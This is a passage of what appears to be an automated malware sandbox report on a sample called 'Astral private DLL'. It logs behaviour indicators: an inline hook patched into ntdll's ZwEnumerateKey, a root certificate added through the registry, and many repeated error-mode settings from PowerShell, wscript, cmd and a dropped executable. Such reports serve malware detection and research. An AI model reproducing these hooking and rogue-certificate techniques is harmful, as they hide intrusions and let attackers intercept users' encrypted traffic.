                                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
